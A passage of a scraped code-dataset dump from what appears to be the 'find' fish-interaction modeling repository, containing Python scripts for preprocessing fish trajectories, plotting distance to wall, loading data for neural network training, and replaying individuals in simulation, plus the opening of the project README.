[np.linalg.norm(\n ref - data[i-1, (x * 2): (x * 2 + 2)]) for x in range(data.shape[1] // 2)]\n idx_min = np.argmin(distances)\n if distances[idx_min] < np.linalg.norm(data[i, (idx_min * 2):(idx_min * 2 + 2)] - data[i-1, (idx_min * 2):(idx_min * 2 + 2)]):\n tmp = data[i, (ind * 2): (ind * 2 + 2)]\n data[i, (ind * 2): (ind * 2 + 2)] = data[i,\n (idx_min * 2): (idx_min * 2 + 2)]\n data[i, (idx_min * 2): (idx_min * 2 + 2)] = tmp\n return data\n\n\ndef correct_jumping(data, files, args={'jump_threshold': 0.08}):\n new_data = deepcopy(data)\n\n # bootstrap the inverse index table\n idf_idx_track = {}\n for i in range(len(data)):\n idf_idx_track[i] = i\n\n it = 0\n while it < len(new_data):\n data_it = new_data[it]\n stop_it = -1\n\n for i in range(1, data_it.shape[0]):\n for ind in range(data_it.shape[1] // 2):\n ref = data_it[i, (ind * 2): (ind * 2 + 2)]\n ref_prev = data_it[i-1, (ind * 2): (ind * 2 + 2)]\n distance = np.linalg.norm(ref - ref_prev)\n if distance > args['jump_threshold']:\n stop_it = i\n break\n\n if stop_it > 0:\n break\n\n if stop_it >= 0:\n new_data[it] = data_it[:stop_it, :]\n new_data.append(data_it[stop_it:, :])\n if 'split' not in files[it]:\n files.append(files[it].replace('.dat', '_split.dat'))\n else:\n 
files.append(files[it])\n\n            idf_idx_track[len(files)-1] = idf_idx_track[it]\n\n            print('Splitting file ' + files[it] +\n                  ' at timestep ' + str(stop_it))\n        else:\n            new_data[it] = data_it\n\n        it += 1\n    return new_data, files, idf_idx_track\n\n\ndef skip_zero_movement(data, args={'window': 30}):\n    \"\"\"\n    :brief: the function will remove instances of the trajectories where the individual(s) are not moving faster than\n            a set threshold\n\n    :param data: np.array\n    :param args: dict, optional extra arguments provided to the function\n    :return: np.array\n    \"\"\"\n\n    window = args['window']\n    hwindow = window // 2\n    idcs_remove = []\n    for ind in range(data.shape[1] // 2):\n        reference = data[:, (ind * 2): (ind * 2 + 2)]\n        for i in tqdm.tqdm(range(1, reference.shape[0]), desc='Checking movement in window for individual ' + str(ind)):\n            lb = max([0, i - hwindow])\n            ub = min([i + hwindow, reference.shape[0]])\n\n            last_row = reference[i-1, :]\n            distance_covered = 0\n\n            for w in range(lb, ub):\n                distance_covered += np.linalg.norm(last_row - reference[w, :])\n                last_row = reference[w, :]\n\n            if distance_covered < args['distance_threshold']:\n                idcs_remove += [i]\n\n    idcs_remove = list(set(idcs_remove))\n    if len(idcs_remove) > 0:\n        filtered_data = np.delete(data, idcs_remove, axis=0)\n    else:\n        filtered_data = data\n\n    if 'verbose' in args.keys() and args['verbose']:\n        print('Lines skipped ' +\n              str(data.shape[0] - filtered_data.shape[0]) + ' out of ' + str(data.shape[0]))\n\n    if data.shape[0] - filtered_data.shape[0] > 0:\n        return skip_zero_movement(filtered_data, args)\n    else:\n        return filtered_data\n\n\ndef cspace(data, args={}):\n    \"\"\"\n    :brief: Invalidate positions that fall inside the inner radius and fill them in along a circular trajectory\n    :param data: np.array, matrix of x, y positions\n    :param args: dict, additional arguments for the fitting method\n    :return: np.array, matrix with the corrected x, y positions\n    \"\"\"\n\n    info = ExperimentInfo([interpolate(data, args)])\n    if not 'radius' in args.keys():\n        radius = (0.29, 0.19)\n    else:\n        radius = args['radius']\n    center = info.center()\n\n    for i in range(data.shape[1] // 2):\n        r = np.sqrt((data[:, i * 2] - center[0]) ** 2 +\n                    (data[:, i * 2 + 1] - center[1]) ** 2)\n        idcs = np.where(r < radius[1])\n        data[idcs, i * 2] = np.nan\n        data[idcs, i * 2 + 1] = np.nan\n\n    def angle_to_pipi(dif):\n        while True:\n            if dif < -np.pi:\n                dif += 2. * np.pi\n            if dif > np.pi:\n                dif -= 2. 
* np.pi\n if (np.abs(dif) <= np.pi):\n break\n return dif\n\n def find_next(xy, row_idx):\n \"\"\"\n :brief: Given a matrix of xy positions and the current timestep, find the next valid (non nan) point\n :param xy: numpy.array, matrix of x, y positions (m x 2 where m the number of timsteps)\n :param row_idx: int, current timestep\n :return: tuple, the next known point accompanied by its index in the position matrix\n \"\"\"\n\n next_known = (-1, -1)\n for i in range(row_idx + 1, np.shape(xy)[0]):\n if not np.isnan(xy[i]).any():\n next_known = (xy[i], i - row_idx)\n break\n return next_known\n\n def fit_circle(pt1, pt2, center):\n \"\"\"\n :brief: Fit a circle between two points and a given center\n :param pt1: tuple, x, y positions for the first point\n :param pt2: tuple, x, y positions for the second point\n :param center: tuple, desired center for the fitted circle\n :return: tuple(float, tuple(float, float, float)), r is the radius of the fitted circle,\n theta the angle between the new points,\n theta1, theta2 the angle of pt1 and pt2\n starting from zero, respectively\n \"\"\"\n\n r1 = np.sqrt((pt1[0] - center[0]) ** 2 + (pt1[1] - center[1]) ** 2)\n r2 = np.sqrt((pt2[0] - center[0]) ** 2 + (pt2[1] - center[1]) ** 2)\n r = (r1 + r2) / 2.0\n\n theta1 = np.arctan2(pt1[1], pt1[0])\n theta1 = (theta1 + np.pi) % (2 * np.pi)\n theta2 = np.arctan2(pt2[1], pt2[0])\n theta2 = (theta2 + np.pi) % (2 * np.pi)\n theta = angle_to_pipi(theta1 - theta2)\n return r, (theta, theta1, theta2)\n\n def fill_between_circular(last_known, next_known, center):\n \"\"\"\n :brief: Fill a circular trajectory with mising values given the first and next valid positions\n :param last_known: list, the last known valid x, y position\n :param next_known: list, the next known point and the number of missing values between this and the last known\n :return: list, x, y position that was estimated according to the given points\n \"\"\"\n\n r, (theta, theta1, _) = fit_circle(\n np.array(last_known), np.array(next_known[0]), center)\n sgn = np.sign(theta)\n phi = (np.abs(theta) / (next_known[1] + 1)) # step angle\n estimated = [r * np.cos(theta1 - sgn * phi) + center[0],\n r * np.sin(theta1 - sgn * phi) + center[1]]\n return estimated\n\n def fill_forward_circular(second_last_known, last_known, args):\n \"\"\"\n :brief: Given the two last known positions and the center of a circular setup,\n attempt to find the next position of a missing trajectory\n :param second_last_known: list, the second to last known position\n :param last_known: list, the last known valid x, y position\n :return: tuple, the next known point accompanied by its index in the position matrix\n \"\"\"\n\n r, (theta, _, theta2) = fit_circle(\n np.array(second_last_known), np.array(last_known), center)\n sgn = np.sign(theta)\n phi = np.abs(theta) # step angle\n return [r * np.cos(theta2 - sgn * phi) + center[0],\n r * np.sin(theta2 - sgn * phi) + center[1]]\n\n def fill_circle(row_idx, xy, output_matrix, args):\n \"\"\"\n :brief: Main logic to fill missing trajectory values with circular ones\n :param row_idx: int, current row of interest index\n :param xy: np.array, original trajectory matrix\n :param output_matrix: np.array, containing the corrected positions so far\n :param args: dict, additional arguments for the algorithm\n :return: np.array, valid row with circular tajectory\n \"\"\"\n row = xy[row_idx]\n\n if np.isnan(row).any():\n next_known = find_next(xy, row_idx)\n\n if len(output_matrix) < 1: # continue trajectory according to next two known 
positions\n second_next = find_next(xy, row_idx + next_known[1] + 1)\n if second_next[1] > 1:\n second_next = (fill_between_circular(\n next_known[0], second_next, center), -1)\n return fill_forward_circular(second_next[0], next_known[0], center)\n else:\n last_known = output_matrix[-1]\n if next_known[1] > 0:\n return fill_between_circular(last_known, next_known, center)\n else: # continue trajectory according to last two known positions\n return fill_forward_circular(output_matrix[-2], last_known, center)\n else:\n return row\n\n for idx in range(data.shape[1] // 2):\n output_matrix = []\n for i in range(data.shape[0]):\n row = fill_circle(\n i, data[:, (idx * 2): (idx * 2 + 2)], output_matrix, center)\n if len(row) == 0:\n continue\n output_matrix.append(row)\n corrected_matrix = np.array(output_matrix)\n data[:, idx * 2] = corrected_matrix[:, 0]\n data[:, idx * 2 + 1] = corrected_matrix[:, 1]\n return data\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Preprocess fish trajectories')\n parser.add_argument('--path', '-p', type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--filename', '-f', type=str,\n help='Position file name',\n required=True)\n parser.add_argument('--out_dir', type=str,\n help='Explicit output directory path',\n default='',\n required=False)\n parser.add_argument('--fps', type=int,\n help='Camera framerate',\n required=True)\n parser.add_argument('--centroids', '-c', type=int,\n help='Frames to use in order to compute the centroidal positions',\n required=True)\n parser.add_argument('--has_probs', action='store_true',\n help='Check this flag if the position file contains idTracker positions',\n default=True)\n parser.add_argument('--toulouse', action='store_true',\n help='Check this flag if the position file contains the toulouse files',\n default=False)\n parser.add_argument('--bobi', action='store_true',\n help='Check this flag if the position file contains the BOBI files',\n default=False)\n parser.add_argument('--plos', action='store_true',\n help='Check this flag if the position file contains the plos files',\n default=False)\n parser.add_argument('--bl', type=float,\n help='Body length',\n default=0.035,\n required=False)\n parser.add_argument('--radius', type=float,\n help='Radius for circular setups',\n default=0.25,\n required=False)\n parser.add_argument('--min_seq_len', type=float,\n help='Minimum sequence length in seconds to keep when filtering',\n default=0.6,\n required=False)\n args = parser.parse_args()\n\n timestep = args.centroids / args.fps\n archive = Archive(args)\n\n if args.bobi:\n data, files = load(args.path, args.filename, has_probs=True, has_heading=False)\n data, info, files = preprocess(data, files,\n # last_known,\n skip_zero_movement,\n # interpolate,\n args={\n 'use_global_min_max': False,\n 'diameter_allowed_error': 0.15,\n\n 'invertY': True,\n 'resY': 1500,\n 'scale': -1, # automatic scale detection\n 'radius': args.radius,\n 'centroids': args.centroids,\n 'distance_threshold': args.bl * 1.2,\n 'jump_threshold': args.bl * 1.5,\n 'window': 30,\n\n 'is_circle': True,\n 'center': True,\n 'normalize': True,\n 'verbose': True,\n 'timestep': timestep,\n\n 'min_seq_len': args.min_seq_len,\n\n })\n info.printInfo()\n\n velocities = Velocities(data, timestep).get()\n\n for i in range(len(data)):\n f = files[i]\n archive.save(data[i], 'exp_' + str(i) +\n '_processed_positions.dat')\n archive.save(velocities[i], 'exp_' +\n str(i) + '_processed_velocities.dat')\n\n with 
open(archive.path().joinpath('file_order.txt'), 'w') as f:\n for order, exp in enumerate(files):\n f.write(str(order) + ' ' + exp + '\\n')\n elif args.toulouse:\n data, files = load(args.path, args.filename, False)\n data, info, files = preprocess(data, files,\n # last_known,\n skip_zero_movement,\n # interpolate,\n args={\n 'use_global_min_max': False,\n 'diameter_allowed_error': 0.15,\n\n 'invertY': True,\n 'resY': 1080,\n 'scale': -1, # automatic scale detection\n 'radius': args.radius,\n 'centroids': args.centroids,\n 'distance_threshold': args.bl * 1.2,\n 'jump_threshold': args.bl * 1.5,\n 'window': 30,\n\n 'is_circle': True,\n 'center': True,\n 'normalize': True,\n 'verbose': True,\n 'timestep': timestep,\n\n 'min_seq_len': args.min_seq_len,\n\n })\n info.printInfo()\n\n velocities = Velocities(data, timestep).get()\n\n for i in range(len(data)):\n f = files[i]\n archive.save(data[i], 'exp_' + str(i) +\n '_processed_positions.dat')\n archive.save(velocities[i], 'exp_' +\n str(i) + '_processed_velocities.dat')\n\n with open(archive.path().joinpath('file_order.txt'), 'w') as f:\n for order, exp in enumerate(files):\n f.write(str(order) + ' ' + exp + '\\n')\n elif args.plos:\n data, files = load(args.path, args.filename, True)\n data, info, files = preprocess(data, files,\n # last_known,\n # skip_zero_movement,\n # interpolate,\n cspace,\n args={\n 'invertY': True,\n 'resY': 1024,\n 'scale': 1.11 / 1024,\n 'centroids': args.centroids,\n 'distance_threshold': 0.00875,\n 'center': True,\n 'normalize': True,\n 'verbose': True,\n 'timestep': timestep,\n\n 'min_seq_len': args.min_seq_len,\n\n })\n info.printInfo()\n\n velocities = Velocities(data, timestep).get()\n\n for i in range(len(data)):\n f = files[i]\n exp_num = w2n.word_to_num(os.path.basename(\n str(Path(f).parents[0])).split('_')[-1])\n archive.save(data[i], 'exp_' + str(exp_num) +\n '_processed_positions.dat')\n archive.save(velocities[i], 'exp_' +\n str(exp_num) + '_processed_velocities.dat')\n\n with open(archive.path().joinpath('file_order.txt'), 'w') as f:\n for order, exp in enumerate(files):\n f.write(str(order) + ' ' + exp + '\\n')\n else:\n data, files = load(args.path, args.filename, True)\n data, info, files = preprocess(data, files,\n # last_known,\n skip_zero_movement,\n # interpolate,\n # cspace,\n args={\n 'use_global_min_max': False,\n 'diameter_allowed_error': 0.15,\n\n 'invertY': True,\n 'resY': 1500,\n 'scale': -1, # automatic scale detection\n # 'scale': 1.12 / 1500,\n 'radius': args.radius,\n\n 'centroids': args.centroids,\n 'distance_threshold': args.bl * 1.2,\n 'jump_threshold': args.bl * 1.5,\n 'window': 30,\n\n 'is_circle': True,\n 'center': True,\n 'normalize': True,\n 'verbose': True,\n 'timestep': timestep,\n\n 'min_seq_len': args.min_seq_len,\n\n })\n info.printInfo()\n\n velocities = Velocities(data, timestep).get()\n\n for i in range(len(data)):\n f = files[i]\n archive.save(data[i], 'exp_' + str(i) +\n '_processed_positions.dat')\n archive.save(velocities[i], 'exp_' +\n str(i) + '_processed_velocities.dat')\n\n with open(archive.path().joinpath('file_order.txt'), 'w') as f:\n for order, exp in enumerate(files):\n f.write(str(order) + ' ' + exp + '\\n')\n"
},
{
"alpha_fraction": 0.5145992040634155,
"alphanum_fraction": 0.5211084485054016,
"avg_line_length": 36.60139846801758,
"blob_id": "a9e53330b000849d0af2ebf29018e003b8ec23a3",
"content_id": "950293f71877f289129f3c3d8cf4b644826da826",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5377,
"license_type": "no_license",
"max_line_length": 166,
"num_lines": 143,
"path": "/find/plots/spatial/distance_to_wall.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\n\nfrom find.utils.utils import angle_to_pipi, compute_leadership\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\n\n\ndef distance_plot(data, positions, ax, args, clipping_range=[0.0, 0.6]):\n lines = ['--', ':']\n linecycler = cycle(lines)\n new_palette = uni_palette()\n new_palette *= 3\n colorcycler = cycle(sns.color_palette(new_palette))\n\n leadership = {}\n for k in sorted(data.keys()):\n pos = positions[k]\n vel = Velocities(pos, args.timestep).get()\n leadership[k] = []\n for idx in range(len(pos)):\n (_, leadership_timeseries) = compute_leadership(pos[idx], vel[idx])\n leadership[k].append(leadership_timeseries)\n\n labels = []\n for k in sorted(data.keys()):\n labels.append(k)\n distances = data[k]\n leaders = leadership[k]\n\n leader_dist = []\n follower_dist = []\n\n for idx in range(len(leaders)):\n leadership_mat = np.array(leaders[idx])\n dist_mat = distances[idx]\n\n num_individuals = dist_mat.shape[1]\n for j in range(num_individuals):\n idx_leaders = np.where(leadership_mat[:, 1] == j)\n\n leader_dist += dist_mat[idx_leaders, j].tolist()[0]\n follower_idcs = list(range(num_individuals))\n follower_idcs.remove(j)\n for fidx in follower_idcs:\n follower_dist += dist_mat[idx_leaders, fidx].tolist()[0]\n\n print('Dist to wall', k)\n print('LF: ', np.mean(leader_dist+follower_dist),\n np.std(leader_dist+follower_dist))\n print('L: ', np.mean(leader_dist),\n np.std(leader_dist))\n print('F: ', np.mean(follower_dist),\n np.std(follower_dist))\n\n ccolour = next(colorcycler)\n # ax = sns.kdeplot(leader_dist + follower_dist, ax=ax, color=ccolour,\n # linestyle=next(linecycler), label=k, linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=clipping_range, bw_adjust=0.8, cut=-1)\n ax = sns.kdeplot(leader_dist, ax=ax, color=ccolour,\n linestyle='--', label='Leader (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=clipping_range, bw_adjust=0.8, cut=-1)\n ax = sns.kdeplot(follower_dist, ax=ax, color=ccolour,\n linestyle=':', label='Follower (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=clipping_range, bw_adjust=0.8, cut=-1)\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n positions = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = []\n positions[e] = []\n for p in pos:\n matrix = np.loadtxt(p) * args.radius\n dist_mat = []\n for i in range(matrix.shape[1] // 2):\n distance = args.radius - \\\n np.sqrt(matrix[:, i * 2] ** 2 + matrix[:, i * 2 + 1] ** 2)\n dist_mat.append(distance)\n dist_mat = np.array(dist_mat).T\n data[e].append(dist_mat)\n positions[e].append(matrix)\n\n _ = plt.figure(figsize=(5, 5))\n ax = plt.gca()\n\n distance_plot(data, positions, ax, args)\n\n ax.set_xlabel(r'$r_w$ (m)')\n ax.set_ylabel('PDF')\n ax.legend()\n plt.savefig(path + 'distance_to_wall.png')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Distance to wall figure')\n parser.add_argument('--path', '-p', type=str,\n help='Path to data directory',\n required=True)\n parser.add_argument('--radius', '-r', type=float,\n help='Raidus',\n default=0.25,\n required=False)\n parser.add_argument('--timestep', '-t', type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--kde_gridsize',\n type=int,\n help='Grid size for kernel density estimation plots',\n default=1500,\n required=False)\n 
parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n parser.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.44201424717903137,
"alphanum_fraction": 0.4645981788635254,
"avg_line_length": 34.615943908691406,
"blob_id": "4f90c2f8e66dd43ccacf715e6c0f9cb08c82216e",
"content_id": "170ee772cb631b2287d938c336a7cf820ae2b6d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9830,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 276,
"path": "/find/models/loader.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import glob\nimport pickle\nimport numpy as np\nfrom tqdm import tqdm\n\n\ndef mem_pair_cart(pos, args):\n offset = 1\n if args.timesteps_skip > 0:\n offset = args.timesteps_skip\n\n input_list = []\n output_list = []\n for p in pos:\n inputs = None\n outputs = None\n\n if args.distance_inputs:\n dist = np.sqrt((p[:, 0] - p[:, 2]) ** 2 +\n (p[:, 1] - p[:, 3]) ** 2)\n rad = 1 - np.array([\n np.sqrt(p[:, 0] ** 2 + p[:, 1] ** 2),\n np.sqrt(p[:, 2] ** 2 + p[:, 3] ** 2)\n ]).T\n\n zidcs = np.where(rad < 0)\n if len(zidcs[0]) > 0:\n rad[zidcs] = 0\n\n pos_t_1 = np.roll(p, shift=1, axis=0)[1:-offset, :]\n pos_t = p[offset:-1, :]\n vel_t = (pos_t - pos_t_1) / args.timestep\n vel_t_1 = np.roll(vel_t, shift=1, axis=0)\n pos_t_1 = pos_t_1[1:-1, :]\n vel_t_1 = vel_t_1[1:-1, :]\n pos_t = pos_t[1:-1, :]\n vel_t = vel_t[1:-1, :]\n\n if args.distance_inputs:\n dist_t_1 = np.roll(dist, shift=1)[2:-(offset+1)]\n rad_t_1 = np.roll(rad, shift=1, axis=0)[2:-(offset+1), :]\n\n for fidx in range(p.shape[1] // 2):\n X = []\n Y = []\n\n X.append(pos_t_1[:, fidx * 2])\n X.append(pos_t_1[:, fidx * 2 + 1])\n X.append(vel_t_1[:, fidx * 2])\n X.append(vel_t_1[:, fidx * 2 + 1])\n if args.distance_inputs:\n X.append(rad_t_1[:, fidx])\n\n Y.append(vel_t[:, fidx * 2] - vel_t_1[:, fidx * 2])\n Y.append(vel_t[:, fidx * 2 + 1] - vel_t_1[:, fidx * 2 + 1])\n\n for nidx in range(p.shape[1] // 2):\n if fidx == nidx:\n continue\n X.append(pos_t_1[:, nidx * 2])\n X.append(pos_t_1[:, nidx * 2 + 1])\n X.append(vel_t_1[:, nidx * 2])\n X.append(vel_t_1[:, nidx * 2 + 1])\n if args.distance_inputs:\n X.append(rad_t_1[:, nidx])\n\n if args.distance_inputs:\n X.append(dist_t_1)\n\n if inputs is None:\n inputs = X\n outputs = Y\n else:\n inputs = np.append(inputs, X, axis=1)\n outputs = np.append(outputs, Y, axis=1)\n input_list.append(inputs.T)\n output_list.append(outputs.T)\n return input_list, output_list\n\n\ndef ready_data(data, args):\n def split(x, y, args):\n X = np.empty([0, args.num_timesteps, x.shape[1]])\n if args.prediction_steps == 1:\n Y = np.empty([0, y.shape[1]])\n else:\n Y = np.empty([0, 1, args.prediction_steps, y.shape[1]])\n\n iters = 1\n if args.timesteps_skip > 0:\n iters = args.timesteps_skip\n\n for idxskip in range(iters):\n xh = x[idxskip::(args.timesteps_skip + 1)].copy()\n yh = y[idxskip::(args.timesteps_skip + 1)].copy()\n\n for i in range(args.num_timesteps, xh.shape[0] - args.prediction_steps):\n inp = xh[(i-args.num_timesteps):i, :].reshape(1,\n args.num_timesteps, xh.shape[1])\n\n if args.prediction_steps == 1:\n out = yh[i-1, :]\n else:\n out = yh[(i-1):(i-1+args.prediction_steps), :].reshape(1,\n 1, args.prediction_steps, yh.shape[1])\n X = np.vstack((X, inp))\n Y = np.vstack((Y, out))\n return X, Y\n return split(*data, args)\n\n\ndef no_mem_pair_cart(pos, args):\n inputs = None\n outputs = None\n for p in tqdm(pos, desc='Loading files'):\n if p.shape[0] < 2 + args.timesteps_skip:\n continue\n\n offset = 1\n if args.timesteps_skip > 0:\n offset = args.timesteps_skip\n\n if args.distance_inputs:\n dist = np.sqrt((p[:, 0] - p[:, 2]) ** 2 +\n (p[:, 1] - p[:, 3]) ** 2)\n rad = 1 - np.array([\n np.sqrt(p[:, 0] ** 2 + p[:, 1] ** 2),\n np.sqrt(p[:, 2] ** 2 + p[:, 3] ** 2)\n ]).T\n\n zidcs = np.where(rad < 0)\n if len(zidcs[0]) > 0:\n rad[zidcs] = 0\n\n pos_t_1 = np.roll(p, shift=1, axis=0)[1:-offset, :]\n pos_t = p[offset:-1, :]\n vel_t = (pos_t - pos_t_1) / args.timestep\n vel_t_1 = np.roll(vel_t, shift=1, axis=0)\n pos_t_1 = pos_t_1[1:-1, :]\n vel_t_1 = vel_t_1[1:-1, :]\n pos_t = pos_t[1:-1, :]\n 
vel_t = vel_t[1:-1, :]\n\n if args.distance_inputs:\n dist_t_1 = np.roll(dist, shift=1)[2:-(offset+1)]\n rad_t_1 = np.roll(rad, shift=1, axis=0)[2:-(offset+1), :]\n\n for fidx in range(p.shape[1] // 2):\n X = []\n Y = []\n\n X.append(pos_t_1[:, fidx * 2])\n X.append(pos_t_1[:, fidx * 2 + 1])\n X.append(vel_t_1[:, fidx * 2])\n X.append(vel_t_1[:, fidx * 2 + 1])\n if args.distance_inputs:\n X.append(rad_t_1[:, fidx])\n\n Y.append(vel_t[:, fidx * 2] - vel_t_1[:, fidx * 2])\n Y.append(vel_t[:, fidx * 2 + 1] - vel_t_1[:, fidx * 2 + 1])\n\n for nidx in range(p.shape[1] // 2):\n if fidx == nidx:\n continue\n X.append(pos_t_1[:, nidx * 2])\n X.append(pos_t_1[:, nidx * 2 + 1])\n X.append(vel_t_1[:, nidx * 2])\n X.append(vel_t_1[:, nidx * 2 + 1])\n if args.distance_inputs:\n X.append(rad_t_1[:, nidx])\n\n if args.distance_inputs:\n X.append(dist_t_1)\n\n if inputs is None:\n inputs = X\n outputs = Y\n else:\n inputs = np.append(inputs, X, axis=1)\n outputs = np.append(outputs, Y, axis=1)\n return inputs, outputs\n\n\ndef split_cart(num_individuals, data, args):\n if num_individuals == 2:\n if 'LSTM' in args.model:\n X_list, Y_list = mem_pair_cart(data, args)\n x_shape = (0, args.num_timesteps, X_list[0].shape[1])\n if args.prediction_steps == 1:\n y_shape = (0, Y_list[0].shape[1])\n else:\n y_shape = (0, 1, args.prediction_steps, Y_list[0].shape[1])\n Xh = np.empty(x_shape)\n Yh = np.empty(y_shape)\n for idx in tqdm(range(len(X_list)), desc='Converting data to LSTM compatible format'):\n Xi = X_list[idx]\n Yi = Y_list[idx]\n (Xi, Yi) = ready_data((Xi, Yi), args)\n if Xi.shape[0] == 0:\n continue\n Xh = np.vstack((Xh, Xi))\n Yh = np.vstack((Yh, Yi))\n return Xh, Yh\n else:\n X, Y = no_mem_pair_cart(data, args)\n return X.T, Y.T\n return [], []\n\n\nclass Loader:\n def __init__(self, path):\n self._path = path\n self._num_individuals = None\n\n def prepare(self, data, args):\n assert self._num_individuals is not None\n if not args.polar:\n return split_cart(self._num_individuals, data, args)\n else:\n return [], [] # not implemented\n\n def split_to_sets(self, inputs, outputs, args):\n assert sum(\n [args.train_fraction, args.val_fraction, args.test_fraction]) == 1, 'Split fractions should add up to 1.0'\n\n # set lengths\n train_split = int(inputs.shape[0] * args.train_fraction)\n val_split = int(inputs.shape[0] * args.val_fraction)\n\n # actual data split\n train_inputs = inputs[:train_split]\n train_outputs = outputs[:train_split]\n\n val_inputs = inputs[train_split:(train_split + val_split)]\n val_outputs = outputs[train_split:(train_split + val_split)]\n\n test_inputs = inputs[(train_split + val_split):]\n test_outputs = outputs[(train_split + val_split):]\n\n return (train_inputs, train_outputs), (val_inputs, val_outputs), (test_inputs, test_outputs)\n\n def load_from_sets(self,\n training_filename='training_{type}', val_filename='val_{type}', test_filename='test_{type}',\n training_path='/train', val_path='/val', test_path='/test'):\n\n with open(self._path + training_path + '/' + training_filename.replace('{type}', 'inputs') + '.pkl', 'rb') as f:\n train_inputs = pickle.load(f)\n\n with open(self._path + training_path + '/' + training_filename.replace('{type}', 'outputs') + '.pkl', 'rb') as f:\n train_outputs = pickle.load(f)\n\n with open(self._path + val_path + '/' + val_filename.replace('{type}', 'inputs') + '.pkl', 'rb') as f:\n val_inputs = pickle.load(f)\n\n with open(self._path + val_path + '/' + val_filename.replace('{type}', 'outputs') + '.pkl', 'rb') as f:\n val_outputs = 
pickle.load(f)\n\n with open(self._path + test_path + '/' + test_filename.replace('{type}', 'inputs') + '.pkl', 'rb') as f:\n test_inputs = pickle.load(f)\n\n with open(self._path + test_path + '/' + test_filename.replace('{type}', 'outputs') + '.pkl', 'rb') as f:\n test_outputs = pickle.load(f)\n\n return (train_inputs, train_outputs), (val_inputs, val_outputs), (test_inputs, test_outputs)\n\n def load(self, fname, is_absolute=False):\n if not is_absolute:\n files = glob.glob(self._path + '/raw/*' + fname)\n else:\n files = glob.glob(fname)\n pos = []\n for f in files:\n matrix = np.loadtxt(f)\n pos.append(matrix)\n self._num_individuals = pos[0].shape[1] // 2\n return pos, files\n"
},
{
"alpha_fraction": 0.6377358436584473,
"alphanum_fraction": 0.6402515769004822,
"avg_line_length": 32.125,
"blob_id": "f695ff0ad7aab598eb2d173cefd5770994993b79",
"content_id": "7b4e51282555cde24f4e10f4ec1f389619978c03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 795,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 24,
"path": "/find/simulation/replay_individual.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.simulation.simu.simulation.individual import Individual\n\n\nclass ReplayIndividual(Individual):\n def __init__(self, positions, velocities):\n # explicitly setting that this is not a robotic/virtual individual\n super().__init__(is_robot=False)\n self._position_history = positions\n print(positions.shape)\n self._velocity_history = velocities\n self._position = self._position_history[0, :]\n self._velocity = self._velocity_history[0, :]\n\n def interact(self, simu):\n pass\n\n def move(self, simu):\n self._position = self._position_history[simu.get_current_iteration(\n ), :]\n self._velocity = self._velocity_history[simu.get_current_iteration(\n ), :]\n\n def _history_update(self, simu):\n pass\n"
},
{
"alpha_fraction": 0.6390977501869202,
"alphanum_fraction": 0.646616518497467,
"avg_line_length": 12.300000190734863,
"blob_id": "62ca2e228061d0ff558d6f5312a61636ee92cd75",
"content_id": "3f91b8e75ea76f84bb60e04ea6c3b736d53c1013",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 133,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 10,
"path": "/find/models/tf_activations.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import tensorflow.keras.backend as K\n\n\ndef gaussian(x):\n return K.exp(-K.pow(x, 2))\n\n\nactivations = {\n 'gaussian': gaussian,\n}\n"
},
{
"alpha_fraction": 0.7369888424873352,
"alphanum_fraction": 0.7485129833221436,
"avg_line_length": 41.69841384887695,
"blob_id": "2051b37bb98222a8ba1ee6bf57eca5d3de5a5316",
"content_id": "1f2bf8c416d4fe02cbf2ca9dc07f1cb8fc6f0ce7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5381,
"license_type": "no_license",
"max_line_length": 380,
"num_lines": 126,
"path": "/Readme.md",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "[](https://zenodo.org/badge/latestdoi/337859711)\n\n# Fish INteraction moDeling framework (~> find)\n\nThis repo contains contains an attempt to unify multiple methodologies and packages to allow for easily pre-processing and modeling social interactions and behavioural responses of fish. While this could as well be adapted to any kind of social or behavioural interactions that can be observed from spatial data, this has been thorougly developed and tested for fish interactions.\n\nTo this point the framework contains the following discrete packages that help in the study and understanding of interactions:\n\n1. Pre-processing code to filter out tracking system inaccuracies, smooth data, segment experimental files when tracking confidence is low and storage.\n2. Modeling code that allows the user to choose a model if her/his choice (or build one) and quickly train it.\n3. Simulation code that allows the user to thoroughly test the generated model against the real data either in a 'Real VS Model' comparison or 'Model VS Model' ability to produce the global dynamics and demonstrate the emergence of more complex 